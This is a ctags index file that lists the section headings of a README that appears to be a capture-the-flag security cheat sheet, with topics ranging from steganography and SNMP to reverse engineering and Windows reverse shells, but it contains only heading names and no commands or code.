PowerShell README.md /^PowerShell$/;" s
Python Reversing README.md /^Python Reversing$/;" s
Retrieving Network Service Hashes README.md /^Retrieving Network Service Hashes$/;" s
Reverse Engineering README.md /^Reverse Engineering$/;" s
SNMP README.md /^SNMP$/;" s
Steganography README.md /^Steganography$/;" s
Table of Contents README.md /^# Table of Contents$/;" c
Trivia README.md /^Trivia$/;" s
VisualBasicScript Reversing README.md /^VisualBasicScript Reversing$/;" s
WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD! README.md /^# WHEN GIVEN A FILE TO WORK WITH, DO NOT FORGET TO RUN THIS STEGHIDE WITH AN EMPTY PASSWORD!$/;" c
Web README.md /^Web$/;" s
Windows Executables README.md /^Windows Executables$/;" s
Windows Reverse Shells README.md /^Windows Reverse Shells$/;" s